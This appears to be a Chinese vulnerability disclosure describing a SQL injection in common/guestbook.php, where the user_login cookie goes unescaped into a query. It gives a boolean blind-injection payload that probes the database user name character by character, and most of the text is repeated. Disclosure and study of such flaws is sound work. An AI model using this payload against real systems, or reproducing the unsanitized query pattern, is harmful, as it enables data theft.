### 简要描述: RT ### 详细说明: 在common/guestbook.php: ``` $page= isset($_GET['page'])?$_GET['page']:1; $memberlogin='匿名'; if(_getcookie("user_login")!=''){ $disabled=" readonly"; $rs=$db->get_one("select m_email from {$cfg['tb_pre']}member where m_login='"._getcookie("user_login")."'"); if($rs){ $memberlogin=_getcookie("user_login"); $memberemail=$rs['m_email']; } } $query=$db->query("select * from ".$cfg['tb_pre']."help join ".$cfg['tb_pre']."helpsort on `h_sortid`=`s_id` order by h_addtime desc limit 10"); while($row=$db->fetch_array($query)){ $list[]=$row; } $smarty->assign("list",$list); $smarty->assign('memberlogin',$memberlogin); $smarty->assign('memberemail',$memberemail); $smarty->assign('disabled',$disabled); $smarty->assign('veriArray',$veriArray); display('common/guestbook.htm'); ``` 和之前的漏洞一样 _getcookie("user_login")没有做转义 直接带入sql语句,造成sql注入。 注入检查绕过不再重复,之前漏洞已经说过了。 利用bool型盲注法可以控制$memberemail的值(一种是通过前段传入,一种是sql语句读出) POC:' and m_login=@`'` or 1=1 and ord(mid(user(),1,1))=113 limit...
### 简要描述: RT ### 详细说明: 在common/guestbook.php: ``` $page= isset($_GET['page'])?$_GET['page']:1; $memberlogin='匿名'; if(_getcookie("user_login")!=''){ $disabled=" readonly"; $rs=$db->get_one("select m_email from {$cfg['tb_pre']}member where m_login='"._getcookie("user_login")."'"); if($rs){ $memberlogin=_getcookie("user_login"); $memberemail=$rs['m_email']; } } $query=$db->query("select * from ".$cfg['tb_pre']."help join ".$cfg['tb_pre']."helpsort on `h_sortid`=`s_id` order by h_addtime desc limit 10"); while($row=$db->fetch_array($query)){ $list[]=$row; } $smarty->assign("list",$list); $smarty->assign('memberlogin',$memberlogin); $smarty->assign('memberemail',$memberemail); $smarty->assign('disabled',$disabled); $smarty->assign('veriArray',$veriArray); display('common/guestbook.htm'); ``` 和之前的漏洞一样 _getcookie("user_login")没有做转义 直接带入sql语句,造成sql注入。 注入检查绕过不再重复,之前漏洞已经说过了。 利用bool型盲注法可以控制$memberemail的值(一种是通过前段传入,一种是sql语句读出) POC:' and m_login=@`'` or 1=1 and ord(mid(user(),1,1))=113 limit 0,1 # [<img src="https://images.seebug.org/upload/201501/121550179c2dd1399891f1b3a6fcdf378e62d05a.png" alt="BaiduHi_2015-1-12_14-40-15.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/121550179c2dd1399891f1b3a6fcdf378e62d05a.png) [<img src="https://images.seebug.org/upload/201501/1215511362235fdabc5e6574d3a418a0539b718c.png" alt="BaiduHi_2015-1-12_14-40-33.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/1215511362235fdabc5e6574d3a418a0539b718c.png) 将113改成114后: [<img src="https://images.seebug.org/upload/201501/1215513381d00be7d55267ed776b100e9191bb95.png" alt="BaiduHi_2015-1-12_14-40-53.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/1215513381d00be7d55267ed776b100e9191bb95.png) ### 漏洞证明: POC:' and m_login=@`'` or 1=1 and ord(mid(user(),1,1))=113 limit 0,1 # [<img src="https://images.seebug.org/upload/201501/121550179c2dd1399891f1b3a6fcdf378e62d05a.png" alt="BaiduHi_2015-1-12_14-40-15.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/121550179c2dd1399891f1b3a6fcdf378e62d05a.png) [<img src="https://images.seebug.org/upload/201501/1215511362235fdabc5e6574d3a418a0539b718c.png" alt="BaiduHi_2015-1-12_14-40-33.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/1215511362235fdabc5e6574d3a418a0539b718c.png) 将113改成114后: [<img src="https://images.seebug.org/upload/201501/1215513381d00be7d55267ed776b100e9191bb95.png" alt="BaiduHi_2015-1-12_14-40-53.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/1215513381d00be7d55267ed776b100e9191bb95.png)
